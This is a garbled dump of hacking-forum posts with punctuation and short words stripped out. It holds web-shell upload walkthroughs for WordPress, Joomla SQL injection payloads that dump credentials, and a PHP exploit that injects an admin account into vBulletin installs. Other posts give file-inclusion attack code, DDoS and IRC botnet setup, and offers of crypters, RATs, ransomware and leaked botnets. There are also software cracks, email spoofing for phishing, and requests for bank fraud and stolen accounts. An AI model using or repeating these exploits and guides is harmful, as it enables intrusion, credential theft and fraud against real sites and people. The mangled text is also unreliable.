dork code inurl content themes theme name example code inurl content themes appius how use the tools it's easy once you have found your target simply paste the site url theme name your email the textbox click confirm exploit your target vulnerable the register button will enabled click register and the webbrowser will bring you the registration page enter your username and email check your email inbox for the confirmation and the password for your account. 
login the site and there you you also can upload shell into the site. 
how upload shell wordpress site size. 
very nice thank yoiu. 
cookiecatcher open source application which was created assist the exploitation xss cross site scripting within web applications steal user session ids aka session hijacking. 
the use this application purely educational and should not used without proper permission from the target application. 
cookiecatcher built for lamp stack running the following php. 
php curl mysql lynx crontab download. 
ciao grazie tante from italy. 
does anyone know how can add funds paypal payoneer anyone need some cashoits. 
have idea that trying make reality. 
using iphone would like able plug into via usb computer and have search and copy files from specified location onto the phone itself bypassing the computers log. 
would then like able take those files and upload them onto another computer mac windows. 
there guide under beginner hacking about using usb drive accomplish this like that. 
there way essentially partition iphone that portion acts usb drive and can upload that script into that what would like. 
with this same phone would also like have the ability connect another phone and have the same thing but with text messages pictures etc. 
was going make device out raspberry accomplish this but after thinking about figured why not see can accomplish this with already existing phone. 
also there any way all that these things accomplished there way add interface this once attached computer phone that you could even possibly pick and choose which files take you are hurry. 
ets see wrote let's see wrote table width hello friends link not working this trick still working dont beleieve look the below trick posted. 
see the demo click here download link click here virus scan link click here indent. 
long time after came here and thinking write something useful for you guys. 
hello you have some nice information this forum and looking contribute. 
want giveaway one fud crypters. 
have more dont care about becoming detected. 
but please careful many possible can use call the ngcrypt. 
rar anybody needs help just. 
alright going givve lmfoa. 
nice shell keep going. 
hey neo nicce post yeer please post part soon waiting for testing and need help need subdomain for testing possible give private kiddle. 
link not work please update. 
sick can see link mum bangs bed hahahaha. 
can see the method please. 
thanks for sharing working again now. 
bye thank you really. 
tagz wrote wrote table width hello friends this trick still working dont beleieve look the below trick posted. 
cheers mike lets see god tut bro. 
cheers mike can you show your secret. 
perfect keylogger serial code cracked had some free time decide remember how use ollydbg. 
how works tell sumbody. 
does work anyone know. 
i'd like take look thanks. 
thank you will test now. 
before start let ask you some questions have you ever lost your own wifi network password have you already faced situation where you needed wifi connection but didn't have the network password have you ever wanted know the password protected wifi network i'm pretty sure you answered yes least one these questions didn't you well this now over proudly present you the wifi hack clean and lightweight can find and decrypt wep wpa and wpa passwords proxy settings option very easy use. 
lets see works mate. 
want see its work. 
swapnil haxor wrote remote file upload vulnerability locate target will use google dork intext shopping cart developed bitwords media type into your google search box and press enter. 
test the site vulnerable change the url url upload images your images will stored the product images uploaded images directory. 
thanks the links dead its still working can anyone update. 
can see the message sir. 
thank you dearthank you dear. 
get here hide reply hide reply url password hide reply hide reply thx codefire wrote cpanel nightmare priv times faster from puplic version its shows becoz its code. 
let see work not anyway this post still fresh hours ago but has been many people reply this post. 
ill check this out thanks for sharing that hope will work. 
coder reiluke scanner results url download url hello mate thx lay wrote this tool really work but need wordlist for cracking. 
but rply bhi nhi karte kya bat. 
how crack internet download manager idm manually hello friends today going explain how hack crack internet download manager idm manually. 
idm the best internet download manager available internet but its not free and its cracked patched versions contains viruses. 
using this hack you can register the internet download manager idm for free using you own credentials. 
register your name and email. 
explaining the manual hacking method because most users said that patch and keygen contain viruses. 
now suppose you have updated your idm internet download manager and you are using cracked patched version after updating idm shows error message that you have registered idm using fake serial key. 
and after that idm exits and hence doesn't download anything. 
this hack also works for trail idm that means download trail idm from there site and register the professional. 
full version idm with your credentials for free using hack. 
let's start the tutorial how hack crack idm manually. 
steps involved step download the idm trial you already have idm installed update going help then check for updates. 
you don't wanna update your version just click registration. 
step when you click registration now new dialog appears that asking for name last name email address and serial key. 
step now enter you name last name email address and field serial key enter any the following keys rldgn vzh hudwe mnw gena qnagy cmmzu zpi gzljy nfrf slm yzmek uvqw snzf fjjtj flf qcvbk and click register. 
step now after you click will show error message that you have registered idm using fake serial key and idm will exit. 
now here the hack starts. 
step now start then run and type the following text and click enter notepad windir system drivers etc hosts for windows users due security reasons you will not able save hosts file. 
the trick below first all drive then windows folder and then system folder and then drivers folder and then etc folder the etc folder you will see thehosts file. 
now right click hosts file and its properties then security tab and then select your admin account just below will see edit button front change permissions now give the user full control and write and read rights and then click applyand then click now will able edit the hosts file and save changes. 
step now notepad file appears something like this shown below now copy the below lines code and add hosts file shown above. 
com after adding these piece code save the notepad file. 
and exit from there. 
now start your internet download manager and now you idm has been converted full version and specially when you update next time your registration will not expire. 
that means will remain full version for life time and you can update without any problem. 
here proof successfully hacking idm video tutorial here you like tut plz add comment here video youtube egkcjk. 
com watch egkcjk feature player embedded video. 
thanks for the tuturial. 
reply and see downloading link hide reply url hide reply thx for the rat bro codefire wrote blink use your own risk blink cracked just saying that this very badly coded rat the biggest skid this world that xillux. 
awesome man you rock. 
what sites are these for some one sent from iphone using tapatalk. 
thansk duse youte the bestes. 
can posible internet offline junior member posts threads joined jun reputation money donate. 
post greybat offline junior member posts threads joined may reputation location maharashtra country india money. 
yes ready order ready order. 
looking buy australian company emails and password. 
thanks bro always love your tut. 
please list forumes site. 
politeasfuck wrote thank for sharing with nice will try. 
what's about that site. 
avilbot wrote hello india hackers i'm new here and this first post here the latest ferramnetas private hacking enjoy this sharing download and install kins last botnet botnet leaked this private semnana download install and have fun good luck guys thanks rep attach config attach private hacker tools download here good installation let see hope you not give back door. 
yea you heard correct its leaked not believe take look the link hide. 
geihd hide enjoy mike. 
how exploit server using file upload vulnerability through metasploit. 
ice cream sandwich you should use pptp method because broken. 
you can find securitykiss psk secret client area panel tab. 
thank sharing this application. 
dank this will handy. 
exploit title joomla com attachments component arbitrary file upload vulnerability google dork inurl index. 
loads tested lin exploit. 
php option com attac. 
ask upload spt pejv skitt netw hurr kinglet skipp amo vahid ahmadbady iskorpitx hellboy cyber terrorist and all best friend. 
yeah very nice thx man. 
reply see the content you know. 
download thunderbird note that thunderbird recommended prism break website website dedicated the eff company the company which behind the famous onion proxy service tor. 
use pgp mail encryption both you and your partner must configure the mail client use pgp encryption install enigmail the first thing you need install the add which will integrate into thunderbird the ability use pgp encryption your mails. 
then the add ons window search for enigmail you should find plenty add ons corresponding this search which are all related pgp encryption only enigmail our favorite one will will interest. 
click install button then restart thunderbird apply add configuration. 
normally new menu should appear the option menu for enigmail configuration. 
for windows gpg win offers great bundle which comes with kleopatra and course the gnupg libraries use pgp encryption. 
download gpg win when downloaded run the setup. 
when correctly installed should offer you run the kleopatra software. 
choose create personal openpgp key pair with the next step you must enter some information about yourself. 
important not click next yet firstly you must change the key strength for security reasons click advanced settings button see above then switch the rsa key strength from bits default bits maximum and higher security see bellow click then click next finalize the certificate creation wizard. 
you just create your very first certificate now you can choose backup your key pair key pair are composed the public and private key export them later from kleopatra interface. 
you can see details about your certificate double clicking row change the passphrase expiry date etc. 
you can also export your public and private key from the main window selecting row. 
the thunderbird option menu then click openpgp preferences the following window should appears. 
click browse then find the location gnupg content directory which comes with gpg win default location program files gnu gnupg then browse the pub folder and select gpg. 
now you should able work with pgp encryption using thunderbird mail client. 
should normally automatically detect the imported keys private public keys for your accounts and public keys your contacts you already used kleopatra for key importation otherwise nothing appears first you must import your private and public keys and also all your contact public keys. 
this means everything went well during importation. 
see below then click enable openpgp support enigmail for this identity also recommend check the following check boxes sign non encrypted messages default sign encrypted message default important case you forgot encrypt very confidential mail will automatically encrypt messages default finally the new mail window back openpgp toolbar menu then click encrypt message not already done. 
note that pgp doesn support the message containing html when using pgp send encrypted mail you should avoid composing message using html the following alert should appear then but might not prevent mail sending. 
click this message appears then enter your pass phrase the pass phrase the password you choose during certificate creation wizard without this password you can encrypt read encrypted mails which use your private key this the symmetric encryption protection. 
pass phrase correct the mail should start doing submission process the bellow image can see our message encrypted before sending. 
now will read our fresh encrypted mail our second test inbox phrozentest gmail. 
pass phrase was successfully entered you should able read the mail content. 
conclusion you are now able use pgp encryption secure your mails between you and your colleges friends random people the internet which would like contact you secure way. 
well try hope its good bro. 
encountered with this article tutorials database while going through and after reading this article found the easy hack for bsnl with this article you are able hack bsnl broadband someone say your neighbour's bsnl brooadband account actually the person whose known vulnerable. 
for this you shall need ipscanner tool called angry scanner. 
com ipscan anything similar. 
com step start angry scanner and goto options ports. 
step pick the address any them and open your browser and type. 
omg nice let check this works. 
thnkx sir nice know. 
client side file verification with javascript and html attributes the bypass trivial simply rename your shell with allowed extension content type editing the request header data with intercepting proxy like burp but tamper data add great too. 
for purposes this tutorial use exif pilot. 
edit good pal hooded robin wrote nifty exif editor and shell builder ruby check out here. 
run commands the server usage would. 
php cat etc passwd. 
cat etc passwd you are useful why not click the rep get new tutorial from. 
usual start with basic short intro about file upload vulnerability and then will move for our exciting practicallet thank you brother for your great work. 
tried but failed establish connection. 
dude microsoft windows professional rtm english dvd iso build. 
iso size byte crc fcb sha abc eff fac align note the names the distribution channels for their distribution microsoft hrm cena frev volume hrm cena frev windows professional activation serial crack coming soon. 
after next rerun again again and again download windows final rtm professional rtm english dvd iso mirror hidden content cannot quoted. 
mirror hidden content cannot quoted. 
wrote thanks bro for sharing eyw kaptan. 
verry good you are the best. 
microsoft windows professional rtm english dvd iso build. 
win lin wrote thnx biokinetix wrote anonymous surfing vpn and proxy tools there are many options when comes being anonymous online. 
would love see this. 
this cant need know thanks for sharing bro. 
plz post this post backtrack hacking. 
even not believe that still want look. 
will give try nice one bro. 
where you type that how does this work thanks. 
the link broken not working. 
wanna see this thank you kuch. 
size how upload shell wordpress site this post will show you two ways upload shell wordpress site. 
editing the wordpress theme this method not all wordpress site can edited the theme because certain site admin has change the permission changing theme. 
that case the theme cannot change. 
procedure after you have logged into the site you will see the admin dashboard the left site move your mouse appearance and click editor when you click editor you will see something like this select the theme twenty ten and select. 
php remove all the codes and paste your shell script there update and your shell will executed. 
your shell will content themes themename. 
com content themes twentyten. 
php uploading new theme changing the theme doesn't work you can try uploading your shell uploading new theme. 
procedure firstly download the modified worpress theme with shell. 
download alright now themes and click install theme click upload and you will get upload option. 
browse the theme that you have download news. 
zip and click install now and you will get this. 
your shell will live content themes news bcc. 
com content theme news bcc. 
size don't forget rep thanks you can lol. 
print sacred legion name joomla vulnerability scanner coded mail mem live dot com site hidden content you must reply see links greetz life wulns aler cru. 
jos users com yelp union all select concat username password concat username password from jos users com dms union all select concat username password from jos users com union all select concat username password from jos users com casino union all select username password from jos users com doqment union select concat username password from jos users com alfresco union select concat username password rixf from jos users com countries union select concat username password from jos users print nweb page hidden content you must reply see links chomp target lwp useragent new die could not initialize browser agent 'mozilla. 
res request answer res content answer print results check print joomla component com countries sql injection vulnerability else print error print sacred legion hidden content you must reply see links. 
need good hacker that bank transfer any usa bank. 
all fake cos just tried all and all dead bro can paste newones there please. 
codefirenice one wrote wibr application for testing security the wpa wpa psk wifi networks. 
cyber warrior asfasasgsgf wrote features fully undetected batch code easy setup works with windows vista runs silently the background copies files fast servers trace left process shown makes beep sound once when finished steals text messages iphone backup system info processes running favorites documents pictures videos. 
thanks for droping tutorial. 
thanks alot for share really appreciate. 
thank you for the sharing. 
tnx this was really helpfull. 
does this come with shells automatically need find some. 
will like see your rdp. 
wow scary thought think this easy. 
limewire utorrent msn aim ddos irc irc irc irc chatzilla xchat mirc irc configs. 
imbot clean irc irc irc ddos torrenting warez java java. 
thanks for sharing this you should not use hola vpn because. 
com hola widely popular free vpn service. 
how can ever thank you enough thanks. 
cheers for the info man. 
best free email spoofing tools found online for windows and android this first post. 
made any mistakes please ignore. 
hello guys know many you are searching for free email spoofing tool for sending phishing link anonymously. 
also searched line for free email spoofing tool and found too many tools and websites offering email spoofing but the fact most them are either not working not for free. 
but also found some tools which works perfect for and offers unlimited free email spoofing and supports html email templates also. 
these tools are mainly designed for android and windows device. 
these tools are powerful and easy use. 
think should share these tools with you. 
download link dropbox email spoofer package. 
zip file information android anonymous email. 
apk instant email address. 
apk windows email spoofer. 
exe this one favorite tool configuration configure android tools just install the apk your android device and you are ready. 
configure windows tools you have set smtp server. 
you can not configure this tool please. 
note any these tools are not developed. 
any problem occurs then please contact with corresponding developers those applications. 
you like dislike the thread please post reply. 
works you should get. 
hope works thank you. 
what does basicly you register one account and use the discribed technique for slow but automatically free money user interaction needed. 
html thanks and just let this bot your side bots create additional usd. 
thanks bro will try now. 
skidrowz heir wrote fdfdfdfdfdfdf. 
geihd can't connect that site. 
nice brother but the pics doesn work. 
check virus scan here got. 
nice tools thank you. 
com watch now this. 
com moral the story and how use the very end the video link youtube just add code and you'll able watch. 
thanks for this man would like check this out. 
hope its cool tnx lol. 
tried some but dont work. 
hope this one does. 
really looks intresting pefectly. 
can you code for remote admistrator tool. 
just send posts forums about this site. 
the posts should for people. 
tell them everybody can easily get here. 
you don't need post link this site just write something like everybody can easily get. 
com then put url's your posts the fields below and save. 
after url's checking we'll write the coupon code here. 
example howto then you apply the coupon happyminer. 
com and get the account. 
then sell the account virtaex. 
after you receive for the sold account you should make screenshot and send with testimonial for. 
try this out gonna good. 
thanks for this really cool tool which much more accessible than other ransomeware for sale and expensive. 
nice great tut thanks bro. 
want change random high school website. 
want change the title the webpage say something different also want change the backround image the website not sure what yet. 
question basically how would about this know bit about html java python. 
when the page and change something within the code when refresh the page goes back normal. 
guessing this stuff easy for you guys but new and just would appreciate bit help getting into this type thing. 
thanks advance the website would something like this. 
most probably will try spawn shell the targetted server gain full advantages his her blackhat stuff supposing attack the slave host code. 
php msg passthru get 'attacker' this will the work some other cases like the one code isset admin could also exploited with great ease the attacker just have spoof the variable from the server request and that's not all difficult being get variable code. 
php admin this will and for the cookies thingy it's same. 
txt inject you may notice some additional funcs used inject these are execute and produce successful result would help and bypass magic quotes func and stripslashes too that would possibly lot good the attacker argv header target argv file argv var argv log argv shell argv command argv agent lwp useragent new exec agent get exec exec agent get exec die host seems down print injected successfully print check the shell manually. 
below example what exactly happens when inclusion performed such case indent. 
txt indent since the code adding extensions after file variable means would adding. 
txt thus making the exploitation dumb simple would make the request looks like code. 
php where such case dont exist now the attacker will eliminate the extension successfully exploit the issue posioning null bytes the request made below how the attacker will manage code. 
txt this would make the request eliminate the additional extension and would successfully exploit the issue prevention and filtration prevention it's better design what ever form such way that sanitizes and filters user input before writing actually executing the request the server. 
php var phpinfo now the file under htmlentities strip tags stripslashes protection then this will make the request the attacker totally dumb and course use supposingly simple filtration pattern code. 
will test this thanks. 
good that wonderful can download directlr. 
where the tool give the link. 
nice post please already send you email check your mail box for some helps thanks. 
indent nice post nad nice tutorial indent. 
let test the tool thanks. 
explicite share thanks alot. 
this trick still work today. 
any one have veryfied need bank phishing partner. 
php location secure home updat and here some paypal letters you may need. 
hope and thank you much bro. 
thank pro sharing for. 
gfhf fhfghfhfh fghfgh fhff gfhf fhfghfhfh fghfgh fhff nhgjg. 
it's helpful for developers. 
com jshaw cheatsheets thank you would love read. 
nice post this bot can ddos. 
now i'm gonna show you how send fake email with any email domain you want here first download the program here virustotal after downloading the program run and the program looks like this now fill all text field the application note click hide fake email textbox your fake email example admins fbi. 
does still work see this forum over year old. 
thanks man adams adam. 
this work progress now you're like and you spend lot time the botnets section you probably have notice the excess noob threads. 
not that asking questions bad everyone starts out somewhere but felt like making one thread that can successfully eliminate most all these questions and leave the section for more intelligent topics. 
what dos what ddos what the difference dos denial service attack which causes host deny service. 
this attack from one machine. 
generally these are not very successful useful unless exploit used. 
ddos distributed denial service again attack which cause host deny service. 
however the name would suggest this attack distributed meaning more than one machine used attack. 
the two methods ddos tends much more effective unless vps used discussed later now that you know what you're talking about you're probably wondering how can execute one these attacks there are several ways you can execute ddos attack. 
the most common are. 
vps virtual private server with dos script. 
nix botnet what php shell php shell php script hosted web server used for dos. 
when several php shells are used once you are able make ddos attack. 
now you may ask how make shell shell created hosting shell vps. 
first you would host. 
com and buy vps. 
choose centos your operating system. 
once you have received your vps you would execute these commands. 
indent yum install yum install php indent what you have just done installed web server onto your vps. 
then type indent var html indent now upload your php shell. 
php indent now start your http server your shell ready use. 
type indent service start indent next into your web browser and navigate your vps index. 
php now you've been paying attention you're probably thinking wait this only one host thought you said this was ddos well this several times multiple different vps's and hook them using prodigies web booster source and ddos. 
sorry will not providing tutorial for this. 
forget provide link remind post one the setup for thi will very similar that the shell. 
after buying your vps you will execute this command indent yum install perl indent next indent wget. 
indent script courtesy itsfluffy the script can executed using indent perl super. 
port time seconds indent again this only dos attack however you can set multiple these and use tutorial use multiple these and create ddos attack. 
first clear some confusion i'm going clea some terminology. 
bot software used infect control large amount computers computer infected with such software. 
made two more bots. 
using the word incorrectly just makes harder for other users help you. 
when using irc bot your irc server what you use control your bots. 
i'll showing you how set one these. 
upload the unreal files your vps. 
edit the config file. 
replace your password with your desired password and your with your vps's. 
type these commands yum install gcc yum install zlib yum install openssl yum install openssl devel ulimit. 
type etc security limits. 
conf scroll down the bottom the file and press add this the end the file root hard nofile root soft nofile. 
into the folder that contains your unrealircd files. 
config says permission denied type chmod config. 
press enter until you see setting about ssl. 
input yes and leave the location blank. 
afterwards keep pressing enter until setting involving zip links reached. 
again leave the location blank. 
for the last setting make the number sockets. 
after all this done type make. 
after finishes compiling type. 
add put whatever the description and for irc server put your vps's. 
leave group and password blank. 
join this newly created server. 
make yourself type oper oper the password your config file links setting kaiten linux bot faqs how can become respected member this section the best thing you can respected member this section self sufficient. 
realize that you don't have make thread for everything and that there search function this forum. 
when you're trying set something look for tutorials elsewhere the internet you're having trouble with its likely that someone else has too and asked question about. 
and you can't find any tutorials things try some trial and error. 
the irc error ircd. 
log file found hell why not create that file http bot set seemingly corectly but still doesnt work what make sure all the files' permissions are set. 
also this may seem stupid but make sure that the mysql user has been added the database. 
bot's aren't responding commands irc server what's wrong most irc bots use form authentication via your hostname. 
for the bot respond commands you must have certain hostname. 
this set when you built your bot. 
you sould set your host doing sethost the host that you set during build. 
addition make sure you are using the correct comand prefix. 
when try yum install says that the command doesnt exist. 
you are probably using the wrong most likely ubuntu debian. 
you have solusvm control panel you are able switch your operating system. 
thanks you for sharing rep. 
let see how goes. 
nice one thanks for this. 
does this actually work. 
org hide rep don't forget. 
hohoho blabla bla installing. 
happy want get this code thx. 
ccproxy powerful and easy use utility. 
allows for minutes create your own proxy server and realize the joint connection the internet. 
ccproxy includes innovative features such access control web filter bandwidth control and web cache parent control remote dialer automatic dialer and gives you full control over internet access. 
launch and click register. 
copy machine and paste into keygen. 
click the generate button keygen. 
copy the generated serial number and registration code keygen. 
paste them into the registration window ccproxy and click register. 
check the file hosts windows system drivers etc that's all. 
good have type tools like this thankx. 
thank you for this art. 
very interesting tool thank you. 
i've been looking for good rat for ages hope this works. 
thanks for sharing pid dateline this tutorial for education purposes only and not responsible any way how you use the information provided and what you with the files. 
mail gift wrote thanks again bro but can not find the builder. 
too you can help. 
sound interesting hope find good looking stuff. 
thank for great share. 
color hello india hackers i'm new here and this first post here the latest ferramnetas private hacking enjoy this sharing download and install kins last botnet botnet leaked this private semnana download install and have fun good luck guys thanks rep attach config attach private hacker tools download here good installation. 
tahnks for this bro. 
thanks man let check really need. 
pirateboy wrote attach config attach color nice thanks you. 
thanks for the share reply and see downloading link hide reply hide reply. 
thanks mate this brilliant there link for this please greatful thanks. 
thanks bro please send pass. 
good share will check out. 
let see pswd plz. 
introduction file upload vulnerability tapatalk fdr. 
hello world thank man. 
tell bypass the fortiguard webfiltering. 
also none the proxy softwares are working ulrasurf tor freegate hotspot shield etc. 
imma try dis one right away. 
i'd like take look thanks for the share. 
wrote dont believe show off but today doing attach config attach attach config attach cheers mike. 
thanks for sharing dude very awesome. 
lets see super interested fghjbn. 
four month ago massive data breach the ebay website affected million registered users worldwide after its database was compromised. 
thnq for sharing dear friend. 
have wasted lot time looking for this thanks lot man. 
lets try this thing bet its good. 
what this and let see. 
awesome i'll give try. 
nice share hope work for. 
thank nice share dude. 
wowowo good look thanx. 
gonna try this script. 
hey great need some ome that sells deadfullz for tax. 
thanks for this very nice. 
love this post thankyou admin. 
can't find the crack link sent from samsung sgh using tapatalk. 
can't wait see this wow. 
this tutorial for education purposes only and not responsible any way how you use the information provided and what you with the files. 
hidden content you must reply see links whmcs. 
result mysql query query whmcsmysql and download exploit from following link exploit python hidden content you must reply see this content exploit php hidden content you must reply see this content register new user target whmcs install register. 
thank mate the best. 
com mybb vulnerability scanner. 
thanks mate will test. 
com and does not exist and sends demand for. 
com has the same thing address. 
but don't mind here reply the form domain name type class ttl time live source data length source data domain name name the domain the following source reports domain name for this section are stored the same way question. 
com resolution request the flag will the domain name contains type type the question section query type more the same flag package. 
cool tut for noobs. 
and also can use proxy and vpn's. 
looks good thank you. 
cracked avg keys free avg keys working seriously hit that button that's motivating factor download avg leave like show you'er not leecher don't think necessary for virus scan but for who skeptical here. 
wifi guys this tutorial posted the legion sub forum while back and just got permission post. 
this good starting point for learning firmware hacking your wifi devices. 
many consumer devices are far more capable than the limited feature set exposed the manufacturer. 
have complete near complete control device person must beyond pretty interfaces all the way the serial headers found the motherboard. 
the goal near unlimited control the device. 
requirements device with serial headers multimeter basic electrical knowledge some wire level shifter some cases overview locate serial header serial pins connect wires from serial pins connect serial console via putty this tutorial will use wireless access point. 
this case don't have the password change any settings but connecting the serial console should give root. 
step locate the serial header url. 
jpg url step the serial pins this where basic electrical know how comes into play. 
there are typically four pins each serial connector. 
bare minimum person needs least three pins control the device. 
one ground gnd one receive output and one send commands. 
identify the and gnd connection using multimeter set voltage. 
touch the black lead known electrical ground usually the metal case large metal contact. 
touch the red lead each the four pins. 
the multimeter reads volts one the four pins then that pin either ground ground will also have continuity ground which can tested separate multimeter mode. 
will not also have continuity ground. 
jpg url using dvom measure voltage between large metal ground and serial pins. 
the remaining two pins will and the not usually needed vcc. 
vcc will have constant voltage around. 
volts while will have changing voltage sending things for receive. 
step connect wires from serial port once pins are identified time connect them. 
use tiao usb multi protocol adapter. 
has the advantage ttl voltage shifter don't fry device with power and usb port built don't have custom wire any adapters. 
jpg url step connect the serial console with putty. 
this point everything connected. 
putty can used with the serial setting connect our device via its serial headers. 
gibberish appears the screen you should change the line speed baud rate. 
usually settings are flow control parity stop bits and data bits. 
the following video shows the boot process seen from the serial console after which i'm dropped root shell. 
although had password was able make all configuration changes and read from the shadow file. 
com watch duhd video. 
replying cos want try out thanks. 
want free vpn that helps downloading torrents wrote table width hello friends mium vpnhello everybody here i'm going post mium vpn. 
conf and forbidden error here download link all shell and script used hide. 
com bnp xwyou iyeb hide greetz cyberace legion who made make this tut and team indishell and all indian hackers. 
want content what the hell. 
you had posted adfly link. 
hello guys since the exploit was shared other forums decided post the public. 
any ways find vbulletin target make sure has install upgrade. 
php and right click the page and see source code. 
find var custnumber once found copy upload this code onto server php code. 
org xhtml vbulletin day. 
font size large link text decoration none visited text decoration none hover text decoration none active text decoration none vbulletin. 
upgrade day exploit created found website. 
com urlencode 'version' urlencode 'install' 'checktable' urlencode 'false' 'firstrun' urlencode 'false' 'step' urlencode 'startat' urlencode 'only' urlencode 'false' 'customerid' urlencode post 'customerid' 'options urlencode 'response' urlencode 'yes' 'htmlsubmit' urlencode 'htmldata username urlencode post 'username' 'htmldata password urlencode post 'password' 'htmldata urlencode post 'password' 'htmldata email urlencode post 'email' url ify the data for the postforeach fields key value fields string. 
rtrim fields string open connection curl init set the url number post vars post datacurl setopt curlopt url url curl setopt curlopt post count fields curl setopt curlopt postfields fields string curl setopt curlopt cookiesession true curl setopt curlopt cookie 'bbcustomerid. 
post 'customerid' execute post result curl exec close connectioncurl close exit example. 
com forum install upgrade. 
php website customer username password email are pakistani madleets team once uploaded open the file after that paste that custnumber into the customer. 
box will something like fill the other box's such site url username password and email. 
once done click inject admin and let the page load thats all now the forum and login with the login details which you injected the site with. 
have fun how patch the bug remove the install dir source madleets. 
does not work ops. 
very very nice thanks bro. 
great tip for everyone. 
password list containing passwords and most common used password list thanks for downloads post longer allowed here the download download list viewable download list downloadable download list viewable download list downloadable. 
get here hide reply. 
com fsfm hide reply password hide reply hide reply. 
pratham wrote humm may. 
boss have added you jamo skype. 
features anti sandboxie vmware anubis virtualpc startup melt proxy working windows windows vista windows windows download below hide. 
which the best have lot lists. 
owasp appsec tutorial series episode strict transport security the forth episode the owasp appsec tutorial series. 
this episode describes the importance using for all sensitive communication and how the http strict transport security header can used ensure greater security transforming all http links automatically the browser. 
neo video youtube zev houm. 
com watch zev houm feature bfa list ulpyptypau video. 
skg lsfkg lks lfgk wlk lkglk. 
thanks bro nice work. 
codefire ripper and theif not deal with him has rip off btc and wont give carbon formgrabber beware all new beginners. 
codefire the admin this site will rip you off not any transaction with him has rip off btc for carbon formgrabber and did not give new beginners beware codefire the owner this site ripper and theif. 
please need good tutorials zeus botnet. 
have tried different method with success. 
thanks bro will check this. 
codefirei will check this out inbox wrote this tutorial for education purposes only and not responsible any way how you use the information provided and what you with the files. 
thank you like learn about. 
nice dude will try some this out. 
will try hoope work dasdasa will try hoope work dasdasa will try hoope work dasdasa. 
the pictures dosen work. 
codefire wrote first download reshacker now select winrar. 
exe now press ctrl and type please purchase without don't anything yet let explain how. 
right click the red squared text like this now save the file url url that doesn't work save the file elsewhere winrar. 
exe and then replace with the original file tanks. 
good wanted see works well. 
always interested such kindastuff. 
thank for this mate. 
very grate man happy. 
nice worked thank you. 
what this basically does that will download your server when someone opens your pdf file awesome share thnx lot. 
mybb vulnerability scanner online online service that checks for mybb engine you just have check the link enter the site with the engine. 
the very scanner database yet only. 
size scanner here size. 
are you email hacker. 
will need check some them myself. 
persia wrote tnx for this thank for this. 
good see tuts showing you how protect yourself. 
trident file locker searches for files extensions and add files archive with password. 
good ransomware filename build. 
exe detection rate file size file file sha fbdfa date jul gmt link. 
php scan poison scanner avg free clean avast clean antivir avira clean bitdefender clean clam antivirus clean comodo internet security clean. 
web clean etrust vet clean prot antivirus clean secure internet security clean data clean ikarus security clean kaspersky antivirus clean mcafee clean security essentials clean eset nod clean norman clean norton antivirus clean panda security clean squared clean quick heal antivirus clean solo antivirus clean sophos clean trend micro internet security clean vba antivirus clean zoner antivirus clean aware clean bullguard clean forticlient clean ultimate clean nano antivirus clean panda cmd clean vipre clean clean twister antivirus clean how works download builder. 
com madd sir trident file locker how dll include exe file for builder its only for builder. 
you use source code its need. 
attach config attach domain analyzer security tool finds all the security information for given domain name. 
domain analyzer security analysis tool which automatically discovers and reports information about the given domain. 
its main purpose analyze domains unattended way features creates directory with all the information including nmap output files. 
uses colors remark important information the console. 
detects some security problems like host name problems unusual port numbers and zone transfers. 
heavily tested and very robust against dns configuration problems. 
uses nmap for active host detection port scanning and version information including nmap scripts. 
searches for spf records information find new hostnames addresses. 
searches for reverse dns names and compare them the hostname. 
prints out the country every address. 
creates pdf file with results. 
automatically detects and analyze sub domains searches for domains emails. 
checks the most common hostnames the dns servers. 
checks for zone transfer every dns server. 
finds the reverse names the network range every address. 
finds active host using nmap complete set techniques. 
scan ports using nmap. 
searches for host and port information using nmap. 
automatically detects web servers used. 
crawls every web server page using our web crawler security tool. 
filters out hostnames based their name. 
pseudo randomly searches domains google and automatically analyze them uses ctrl stop current analysis stage and continue working. 
download reply see downloading link cool hide. 
net projects domainanalyzer hide. 
i'm will give try. 
this sounds too good true. 
jpg could better had defaced. 
the link broken bro. 
don't take any tension i'll make new show off section you guys. 
let try this out thanks let try this out thanksdd. 
thanks for nice post. 
thanks for the tutor but all the images this post are showing erroe. 
unable open the link that you have provided. 
moreover have serious issue. 
want hack into gmail account which belongs person who has been giving serious losses since year. 
want hack into his account gather some information save myself. 
tried using openvas for the first time last night hoping able find exploit domain where believe database sitting. 
watched youtube tut that shows that openvas should great place start. 
went through the initial install and set for task. 
for some reason stayed sitting. 
left run overnight and was still this morning. 
stopped the task and tried second time but the exact same thing happened again. 
assuming something that have done wrong anyone else have this happen have any idea what may have done wrong cause this feeling like there some kind setup error watched yet another video openvas and see that before ever installs opens terminal and types openvas and gets bunch info returned. 
when type openvas get bash openvas command not found ran the initial setup again and saw that was already setup the first time. 
initial install saw that didnt let pick password like did both videos watched stuck with some super crazy long letter number password. 
was using this morning via greenbone iceweasel definitely not fan running virtual box seems laggy and cant full screen just looks crappy. 
let see how working. 
does still work can anyone confirm. 
thank you man need this. 
codefire wrote sup all ccan't find link. 
sharing the full version burpsuite today. 
thats what really want. 
nice frankayama wrote wrote need please here first download the program after downloading the program run and the program looks like this now fill all text field the application note click hide fake email textbox your fake email example admins fbi. 
looks very complicated bro. 
lets see what you talking about edit not working this adf. 
was waiting for something like this for months. 
how will get the facebook crack tools and the hacking tools. 
sure its virus nvm thanks you could sell accounts for websites such paypal you could sell hacking software hack for people. 
all depends your knowledge hacking. 
you could get job. 
thanks for the share bro nice day now useless. 
checking i'll post working not. 
require receiver first name and last name receiver address receiver email address payment info for orders over good discounts big buyers are very very welcome and will provide them great stuffs the list transportation high end electronics laptop apple laptop dell laptop toshiba laptop lenovo laptop samsung laptop acer laptop vaio iphone iphone ipad black berry iphone iphone perfums etc transit time from days every days will send shipping tracking payment method btc rules long talk please read rules respect them. 
com icq please contact soon your satisfaction happiness respectfully thank you together make happen. 
let's check how works. 
thanks dio cane bastardo madonna puttana. 
appriciate your work bro nice share thanks lot that helpfull more paying hackers the world our and for all free and then pay free because didnt pay with our money but with somebodys money which dont even who what but spend his moeny. 
anxious can you guys teach. 
test the site vulnerable change the url upload images your images will stored the product images uploaded images directory. 
lets see whats boy. 
comment see the content. 
size wordpress day exploiter wordpress day exploiter tool that allows you register new administrator wordpress sites that have error the file ajax. 
authorization file hranilesche user data instructions for use zero day online wordpress. 
the url field paste the link the site and the field write the name the theme topics and field you mail prescribes soap. 
the site vulnerable then register button will enabled. 
click the register and the web browser will take you the registration page. 
enter the user name and mail address. 
check your inbox for confirmation and the password your account. 
you selected site wordpress vulnerable and you have done all the above steps correctly then you have successfully registered this site the rights the administrator virustotal code. 
com file abe adeb efa bef analysis download wordpress day exploiter tutorial size. 
thank you much for this. 
